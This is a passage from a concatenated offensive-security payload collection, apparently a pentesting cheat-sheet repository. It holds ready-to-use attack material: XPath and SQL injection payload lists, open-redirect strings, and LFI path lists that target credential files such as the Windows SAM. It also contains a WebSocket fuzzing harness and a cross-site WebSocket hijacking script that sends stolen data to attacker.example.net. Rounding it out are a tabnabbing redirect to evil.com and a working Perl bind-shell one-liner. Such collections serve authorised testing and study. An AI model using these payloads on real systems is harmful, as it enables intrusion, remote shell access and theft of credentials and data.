37 | * [PHDays - Attacks on video converters:a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
38 | * [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py)
39 | 


--------------------------------------------------------------------------------
/XPATH Injection/README.md:
--------------------------------------------------------------------------------
 1 | # XPATH injection
 2 | 
 3 | > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Exploitation](#exploitation)
 8 | * [Blind exploitation](#blind-exploitation)
 9 | * [Out Of Band Exploitation](#out-of-band-exploitation)
10 | * [Tools](#tools)
11 | * [References](#references)
12 | 
13 | ## Exploitation
14 | 
15 | Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
16 | 
17 | ```sql
18 | ' or '1'='1
19 | ' or ''='
20 | x' or 1=1 or 'x'='y
21 | /
22 | //
23 | //*
24 | */*
25 | @*
26 | count(/child::node())
27 | x' or name()='username' or 'x'='y
28 | ' and count(/*)=1 and '1'='1
29 | ' and count(/@*)=1 and '1'='1
30 | ' and count(/comment())=1 and '1'='1
31 | search=')] | //user/*[contains(*,'
32 | search=Har') and contains(../password,'c
33 | search=Har') and starts-with(../password,'c
34 | ```
35 | 
36 | ## Blind Exploitation
37 | 
38 | 1. Size of a string
39 |     ```sql
40 |     and string-length(account)=SIZE_INT
41 |     ```
42 | 2. Extract a character
43 |     ```sql
44 |     substring(//user[userid=5]/username,2,1)=CHAR_HERE
45 |     substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
46 |     ```
47 | 
48 | ## Out Of Band Exploitation
49 | 
50 | ```powershell
51 | http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
52 | ```
53 | 
54 | ## Tools
55 | 
56 | - [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
57 | - [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
58 | - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
59 | - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
60 | - [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
61 | 
62 | ## References
63 | 
64 | * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
65 | * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
66 | 


--------------------------------------------------------------------------------
/Web Sockets/Files/ws-harness.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | from __future__ import print_function
 3 | import socket,ssl
 4 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
 5 | from websocket import create_connection, WebSocket
 6 | from urlparse import parse_qs
 7 | import argparse
 8 | import os
 9 | 
10 | LOOP_BACK_PORT_NUMBER = 8000
11 | 
12 | def FuzzWebSocket(fuzz_value):
13 |     print(fuzz_value)
14 |     ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
15 |     result =  ws.recv()
16 |     return result
17 | 
18 | def LoadMessage(file):
19 |     file_contents = ""
20 |     try:
21 |         if os.path.isfile(file):
22 |             f = open(file,'r')
23 |             file_contents = f.read()
24 |             f.close()
25 |     except:
26 |         print("Error reading file: %s" % file)
27 |         exit()
28 |     return file_contents
29 | 
30 | class myWebServer(BaseHTTPRequestHandler):
31 |     
32 |     #Handler for the GET requests
33 |     def do_GET(self):
34 |         qs = parse_qs(self.path[2:])
35 |         fuzz_value = qs['fuzz']
36 |         result = FuzzWebSocket(fuzz_value)
37 |         self.send_response(200)
38 |         self.send_header('Content-type','text/html')
39 |         self.end_headers()
40 |         self.wfile.write(result)
41 |         return
42 | 
43 | parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
44 | parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
45 | parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
46 | args = parser.parse_args()
47 | 
48 | ws_message = LoadMessage(args.message)
49 | 
50 | ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
51 | 
52 | try:
53 |     #Create a web server and define the handler to manage the
54 |     #incoming request
55 |     server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
56 |     print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)
57 |     
58 |     #Wait forever for incoming http requests
59 |     server.serve_forever()
60 | 
61 | except KeyboardInterrupt:
62 |     print('^C received, shutting down the web server')
63 |     server.socket.close()
64 |     ws.close()
65 | 


--------------------------------------------------------------------------------
/File Inclusion/Intruders/LFI-WindowsFileCheck.txt:
--------------------------------------------------------------------------------
 1 | php://input
 2 | C:\boot.ini
 3 | C:\WINDOWS\win.ini
 4 | C:\WINDOWS\php.ini
 5 | C:\WINDOWS\System32\Config\SAM
 6 | C:\WINNT\php.ini
 7 | C:\xampp\phpMyAdmin\config.inc
 8 | C:\xampp\phpMyAdmin\phpinfo.php
 9 | C:\xampp\phpmyadmin\config.inc
10 | C:\xampp\phpmyadmin\phpinfo.php
11 | C:\xampp\phpmyadmin\config.inc.php
12 | C:\xampp\phpMyAdmin\config.inc.php
13 | C:\xampp\apache\conf\httpd.conf
14 | C:\xampp\FileZillaFTP\FileZilla Server.xml
15 | C:\xampp\MercuryMail\mercury.ini
16 | C:\mysql\bin\my.ini
17 | C:\xampp\php\php.ini
18 | C:\xampp\phpMyAdmin\config.inc.php
19 | C:\xampp\tomcat\conf\tomcat-users.xml
20 | C:\xampp\tomcat\conf\web.xml
21 | C:\xampp\sendmail\sendmail.ini
22 | C:\xampp\webalizer\webalizer.conf
23 | C:\xampp\webdav\webdav.txt
24 | C:\xampp\apache\logs\error.log
25 | C:\xampp\apache\logs\access.log
26 | C:\xampp\FileZillaFTP\Logs
27 | C:\xampp\FileZillaFTP\Logs\error.log
28 | C:\xampp\FileZillaFTP\Logs\access.log
29 | C:\xampp\MercuryMail\LOGS\error.log
30 | C:\xampp\MercuryMail\LOGS\access.log
31 | C:\xampp\mysql\data\mysql.err
32 | C:\xampp\sendmail\sendmail.log
33 | C:\apache\log\error.log
34 | C:\apache\log\access.log
35 | C:\apache\log\error_log
36 | C:\apache\log\access_log
37 | C:\apache2\log\error.log
38 | C:\apache2\log\access.log
39 | C:\apache2\log\error_log
40 | C:\apache2\log\access_log
41 | C:\log\error.log
42 | C:\log\access.log
43 | C:\log\error_log
44 | C:\log\access_log
45 | C:\apache\logs\error.log
46 | C:\apache\logs\access.log
47 | C:\apache\logs\error_log
48 | C:\apache\logs\access_log
49 | C:\apache2\logs\error.log
50 | C:\apache2\logs\access.log
51 | C:\apache2\logs\error_log
52 | C:\apache2\logs\access_log
53 | C:\logs\error.log
54 | C:\logs\access.log
55 | C:\logs\error_log
56 | C:\logs\access_log
57 | C:\log\httpd\access_log
58 | C:\log\httpd\error_log
59 | C:\logs\httpd\access_log
60 | C:\logs\httpd\error_log
61 | C:\opt\xampp\logs\access_log
62 | C:\opt\xampp\logs\error_log
63 | C:\opt\xampp\logs\access.log
64 | C:\opt\xampp\logs\error.log
65 | C:\Program Files\Apache Group\Apache\logs\access.log
66 | C:\Program Files\Apache Group\Apache\logs\error.log
67 | C:\Program Files\Apache Group\Apache\conf\httpd.conf
68 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf
69 | C:\Program Files\xampp\apache\conf\httpd.conf
70 | 


--------------------------------------------------------------------------------
/Open Redirect/Intruder/openredirects.txt:
--------------------------------------------------------------------------------
 1 | /%09/example.com
 2 | /%2f%2fexample.com
 3 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
 4 | /%5cexample.com
 5 | /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
 6 | /.example.com
 7 | //%09/example.com
 8 | //%5cexample.com
 9 | ///%09/example.com
10 | ///%5cexample.com
11 | ////%09/example.com
12 | ////%5cexample.com
13 | /////example.com
14 | /////example.com/
15 | ////\;@example.com
16 | ////example.com/
17 | ////example.com/%2e%2e
18 | ////example.com/%2e%2e%2f
19 | ////example.com/%2f%2e%2e
20 | ////example.com/%2f..
21 | ////example.com//
22 | ///\;@example.com
23 | ///example.com
24 | ///example.com/
25 | ///example.com/%2e%2e
26 | ///example.com/%2e%2e%2f
27 | ///example.com/%2f%2e%2e
28 | ///example.com/%2f..
29 | ///example.com//
30 | //example.com
31 | //example.com/
32 | //example.com/%2e%2e
33 | //example.com/%2e%2e%2f
34 | //example.com/%2f%2e%2e
35 | //example.com/%2f..
36 | //example.com//
37 | //google%00.com
38 | //google%E3%80%82com
39 | //https:///example.com/%2e%2e
40 | //https://example.com/%2e%2e%2f
41 | //https://example.com//
42 | /<>//example.com
43 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
44 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
45 | /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
46 | /\/\/example.com/
47 | /\/example.com/
48 | /example.com/%2f%2e%2e
49 | /http://%67%6f%6f%67%6c%65%2e%63%6f%6d
50 | /http://example.com
51 | /http:/example.com
52 | /https:/%5cexample.com/
53 | /https://%09/example.com
54 | /https://%5cexample.com
55 | /https:///example.com/%2e%2e
56 | /https:///example.com/%2f%2e%2e
57 | /https://example.com
58 | /https://example.com/
59 | /https://example.com/%2e%2e
60 | /https://example.com/%2e%2e%2f
61 | /https://example.com/%2f%2e%2e
62 | /https://example.com/%2f..
63 | /https://example.com//
64 | /https:example.com
65 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
66 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
67 | /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
68 | 


--------------------------------------------------------------------------------
/Tabnabbing/README.md:
--------------------------------------------------------------------------------
 1 | # Tabnabbing
 2 | 
 3 | > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [More information about the vulnerability](#More-information-about-the-vulnerability)
 9 | * [How to exploit](#How-to-exploit)
10 | * [How to hunt for it](#How-to-hunt-for-it)
11 | * [References](#references)
12 | 
13 | ## Tools
14 | 
15 | - [Discover Reverse Tabnabbing - Burp Extension](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30)
16 | 
17 | ## More information about the vulnerability
18 | 
19 | When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing.
20 | 
21 | ## How to exploit 
22 | ```
23 | 1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com"
24 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
25 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
26 | 4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example.
27 | 5. The victim tries to log on again and the attacker receives the credentials
28 | ```
29 | 
30 | ## How to hunt for it 
31 | 
32 | As already mentioned, you have to search for the following link formats: 
33 | 
34 | ```html
35 | <a href="..." target="_blank" rel="" />  
36 | or
37 | <a href="..." target="_blank" />
38 | ```
39 | 
40 | ## References
41 | 
42 | - [Reverse Tabnabbing - OWASP, 20.10.20](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
43 | - [Tabnabbing - Wikipedia, 20.10.20](https://en.wikipedia.org/wiki/Tabnabbing)
44 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/Auth_Bypass2.txt:
--------------------------------------------------------------------------------
  1 | ==
  2 | =
  3 | '
  4 | ' --
  5 | ' #
  6 | ' –
  7 | '--
  8 | '/*
  9 | '#
 10 | " --
 11 | " #
 12 | "/*
 13 | ' and 1='1
 14 | ' and a='a
 15 |  or 1=1
 16 |  or true
 17 | ' or ''='
 18 | " or ""="
 19 | 1′) and '1′='1–
 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 22 |  and 1=1
 23 |  and 1=1–
 24 | ' and 'one'='one
 25 | ' and 'one'='one–
 26 | ' group by password having 1=1--
 27 | ' group by userid having 1=1--
 28 | ' group by username having 1=1--
 29 |  like '%'
 30 |  or 0=0 --
 31 |  or 0=0 #
 32 |  or 0=0 –
 33 | ' or         0=0 #
 34 | ' or 0=0 --
 35 | ' or 0=0 #
 36 | ' or 0=0 –
 37 | " or 0=0 --
 38 | " or 0=0 #
 39 | " or 0=0 –
 40 | %' or '0'='0
 41 |  or 1=1
 42 |  or 1=1--
 43 |  or 1=1/*
 44 |  or 1=1#
 45 |  or 1=1–
 46 | ' or 1=1--
 47 | ' or '1'='1
 48 | ' or '1'='1'--
 49 | ' or '1'='1'/*
 50 | ' or '1'='1'#
 51 | ' or '1′='1
 52 | ' or 1=1
 53 | ' or 1=1 --
 54 | ' or 1=1 –
 55 | ' or 1=1--
 56 | ' or 1=1;#
 57 | ' or 1=1/*
 58 | ' or 1=1#
 59 | ' or 1=1–
 60 | ') or '1'='1
 61 | ') or '1'='1--
 62 | ') or '1'='1'--
 63 | ') or '1'='1'/*
 64 | ') or '1'='1'#
 65 | ') or ('1'='1
 66 | ') or ('1'='1--
 67 | ') or ('1'='1'--
 68 | ') or ('1'='1'/*
 69 | ') or ('1'='1'#
 70 | 'or'1=1
 71 | 'or'1=1′
 72 | " or "1"="1
 73 | " or "1"="1"--
 74 | " or "1"="1"/*
 75 | " or "1"="1"#
 76 | " or 1=1
 77 | " or 1=1 --
 78 | " or 1=1 –
 79 | " or 1=1--
 80 | " or 1=1/*
 81 | " or 1=1#
 82 | " or 1=1–
 83 | ") or "1"="1
 84 | ") or "1"="1"--
 85 | ") or "1"="1"/*
 86 | ") or "1"="1"#
 87 | ") or ("1"="1
 88 | ") or ("1"="1"--
 89 | ") or ("1"="1"/*
 90 | ") or ("1"="1"#
 91 | ) or '1′='1–
 92 | ) or ('1′='1–
 93 | ' or 1=1 LIMIT 1;#
 94 | 'or 1=1 or ''='
 95 | "or 1=1 or ""="
 96 | ' or 'a'='a
 97 | ' or a=a--
 98 | ' or a=a–
 99 | ') or ('a'='a
100 | " or "a"="a
101 | ") or ("a"="a
102 | ') or ('a'='a and hi") or ("a"="a
103 | ' or 'one'='one
104 | ' or 'one'='one–
105 | ' or uid like '%
106 | ' or uname like '%
107 | ' or userid like '%
108 | ' or user like '%
109 | ' or username like '%
110 | ' or 'x'='x
111 | ') or ('x'='x
112 | " or "x"="x
113 | ' OR 'x'='x'#;
114 | '=' 'or' and '=' 'or'
115 | ' UNION ALL SELECT 1, @@version;#
116 | ' UNION ALL SELECT system_user(),user();#
117 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
118 | admin' and substring(password/text(),1,1)='7
119 | ' and substring(password/text(),1,1)='7
120 | ' or 1=1 limit 1 -- -+
121 | '="or'
122 | 


--------------------------------------------------------------------------------
/Web Sockets/README.md:
--------------------------------------------------------------------------------
 1 | # Web Sockets Attacks
 2 | 
 3 | > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Using ws-harness.py](#using-ws-harness-py)
 9 | 
10 | ## Tools
11 | 
12 | * [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
13 | 
14 | ## Using ws-harness.py
15 | 
16 | Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
17 | 
18 | ```powershell
19 | python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
20 | ```
21 | 
22 | The content of the message should contains the **[FUZZ]** keyword.
23 | 
24 | ```json
25 | {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
26 | ```
27 | 
28 | Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
29 | 
30 | ```python
31 | sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
32 | ```
33 | 
34 | ## Cross-Site WebSocket Hijacking (CSWSH)
35 | 
36 | If the WebSocket handshake is not correctly protected using a CSRF token or a
37 | nonce, it's possible to use the authenticated WebSocket of a user on an
38 | attacker's controlled site because the cookies are automatically sent by the
39 | browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
40 | 
41 | Example exploit, hosted on an attacker's server, that exfiltrates the received
42 | data from the WebSocket to the attacker:
43 | 
44 | ```html
45 | <script>
46 |   ws = new WebSocket('wss://vulnerable.example.com/messages');
47 |   ws.onopen = function start(event) {
48 |     websocket.send("HELLO");
49 |   }
50 |   ws.onmessage = function handleReply(event) {
51 |     fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
52 |   }
53 |   ws.send("Some text sent to the server");
54 | </script>
55 | ```
56 | 
57 | You have to adjust the code to your exact situation. E.g. if your web
58 | application uses a `Sec-WebSocket-Protocol` header in the handshake request,
59 | you have to add this value as a 2nd parameter to the `WebSocket` function call
60 | in order to add this header.
61 | 
62 | ## References
63 | 
64 | - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
65 | - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
66 | - [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
67 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/Generic_TimeBased.txt:
--------------------------------------------------------------------------------
 1 | # from wapiti
 2 | sleep(5)#
 3 | 1 or sleep(5)#
 4 | " or sleep(5)#
 5 | ' or sleep(5)#
 6 | " or sleep(5)="
 7 | ' or sleep(5)='
 8 | 1) or sleep(5)#
 9 | ") or sleep(5)="
10 | ') or sleep(5)='
11 | 1)) or sleep(5)#
12 | ")) or sleep(5)="
13 | ')) or sleep(5)='
14 | ;waitfor delay '0:0:5'--
15 | );waitfor delay '0:0:5'--
16 | ';waitfor delay '0:0:5'--
17 | ";waitfor delay '0:0:5'--
18 | ');waitfor delay '0:0:5'--
19 | ");waitfor delay '0:0:5'--
20 | ));waitfor delay '0:0:5'--
21 | '));waitfor delay '0:0:5'--
22 | "));waitfor delay '0:0:5'--
23 | benchmark(10000000,MD5(1))#
24 | 1 or benchmark(10000000,MD5(1))#
25 | " or benchmark(10000000,MD5(1))#
26 | ' or benchmark(10000000,MD5(1))#
27 | 1) or benchmark(10000000,MD5(1))#
28 | ") or benchmark(10000000,MD5(1))#
29 | ') or benchmark(10000000,MD5(1))#
30 | 1)) or benchmark(10000000,MD5(1))#
31 | ")) or benchmark(10000000,MD5(1))#
32 | ')) or benchmark(10000000,MD5(1))#
33 | pg_sleep(5)--
34 | 1 or pg_sleep(5)--
35 | " or pg_sleep(5)--
36 | ' or pg_sleep(5)--
37 | 1) or pg_sleep(5)--
38 | ") or pg_sleep(5)--
39 | ') or pg_sleep(5)--
40 | 1)) or pg_sleep(5)--
41 | ")) or pg_sleep(5)--
42 | ')) or pg_sleep(5)--
43 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
44 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
45 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
46 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
47 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
48 | SLEEP(5)#
49 | SLEEP(5)--
50 | SLEEP(5)="
51 | SLEEP(5)='
52 | or SLEEP(5)
53 | or SLEEP(5)#
54 | or SLEEP(5)--
55 | or SLEEP(5)="
56 | or SLEEP(5)='
57 | waitfor delay '00:00:05'
58 | waitfor delay '00:00:05'--
59 | waitfor delay '00:00:05'#
60 | benchmark(50000000,MD5(1))
61 | benchmark(50000000,MD5(1))--
62 | benchmark(50000000,MD5(1))#
63 | or benchmark(50000000,MD5(1))
64 | or benchmark(50000000,MD5(1))--
65 | or benchmark(50000000,MD5(1))#
66 | pg_SLEEP(5)
67 | pg_SLEEP(5)--
68 | pg_SLEEP(5)#
69 | or pg_SLEEP(5)
70 | or pg_SLEEP(5)--
71 | or pg_SLEEP(5)#
72 | '\"
73 | AnD SLEEP(5)
74 | AnD SLEEP(5)--
75 | AnD SLEEP(5)#
76 | &&SLEEP(5)
77 | &&SLEEP(5)--
78 | &&SLEEP(5)#
79 | ' AnD SLEEP(5) ANd '1
80 | '&&SLEEP(5)&&'1
81 | ORDER BY SLEEP(5)
82 | ORDER BY SLEEP(5)--
83 | ORDER BY SLEEP(5)#
84 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
85 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
86 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
87 | +benchmark(3200,SHA1(1))+'
88 | + SLEEP(10) + '
89 | RANDOMBLOB(500000000/2)
90 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
91 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
92 | RANDOMBLOB(1000000000/2)
93 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
94 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
95 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
96 | 


--------------------------------------------------------------------------------
/SQL Injection/HQL Injection.md:
--------------------------------------------------------------------------------
 1 | # Hibernate Query Language Injection 
 2 | 
 3 | > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
 4 | ## Summary
 5 | 
 6 | * [HQL Comments](#hql-comments)
 7 | * [HQL List Columns](#hql-list-columns)
 8 | * [HQL Error Based](#hql-error-based)
 9 | * [References](#references)
10 | 
11 | ## HQL Comments
12 | 
13 | ```sql
14 | HQL does not support comments
15 | ```
16 | 
17 | ## HQL List Columns
18 | 
19 | ```sql
20 | from BlogPosts
21 | where title like '%'
22 |   and DOESNT_EXIST=1 and ''='%' -- 
23 |   and published = true
24 | ```
25 | 
26 | Using an unexisting column will an exception leaking several columns names.
27 | 
28 | ```sql
29 | org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement:
30 |       select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159]
31 | ```
32 | 
33 | ## HQL Error Based
34 | 
35 | ```sql
36 | from BlogPosts
37 | where title like '%11'
38 |   and (select password from User where username='admin')=1
39 |   or ''='%'
40 |   and published = true
41 | ```
42 | 
43 | Error based on value casting.
44 | 
45 | ```sql
46 | Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement:
47 | select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1
48 | ```
49 | 
50 | :warning: **HQL does not support UNION queries**
51 | 
52 | ## References
53 | 
54 | * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
55 | * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
56 | * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
57 | * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
58 | * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
59 | 


--------------------------------------------------------------------------------
/Insecure Deserialization/README.md:
--------------------------------------------------------------------------------
 1 | # Insecure Deserialization
 2 | 
 3 | > Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP
 4 | 
 5 | Check the following sub-sections, located in other files :
 6 | 
 7 | * [Java deserialization : ysoserial, ...](Java.md)
 8 | * [PHP (Object injection) : phpggc, ...](PHP.md)
 9 | * [Ruby : universal rce gadget, ...](Ruby.md)
10 | * [Python : pickle, ...](Python.md)
11 | 
12 | ## References
13 | 
14 | * [Github - ysoserial](https://github.com/frohoff/ysoserial)
15 | * [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net)
16 | * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
17 | * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
18 | * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
19 | * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
20 | * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
21 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
22 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
23 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
24 | * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
25 | * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
26 | * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 
27 | * [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
28 | * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
29 | * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
30 | * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
31 | * [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)


--------------------------------------------------------------------------------
/Methodology and Resources/Bind Shell Cheatsheet.md:
--------------------------------------------------------------------------------
 1 | # Bind Shell
 2 | 
 3 | ## Summary
 4 | 
 5 | * [Bind Shell](#bind-shell)
 6 |     * [Perl](#perl)
 7 |     * [Python](#python)
 8 |     * [PHP](#php)
 9 |     * [Ruby](#ruby)
10 |     * [Netcat Traditional](#netcat-traditional)
11 |     * [Netcat OpenBsd](#netcat-openbsd)
12 |     * [Ncat](#ncat)
13 |     * [Socat](#socat)
14 |     * [Powershell](#powershell)
15 | 
16 | 
17 | ## Perl
18 | 
19 | ```perl
20 | perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
21 | bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
22 | close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
23 | ```
24 | 
25 | ## Python
26 | 
27 | Single line :
28 | ```python
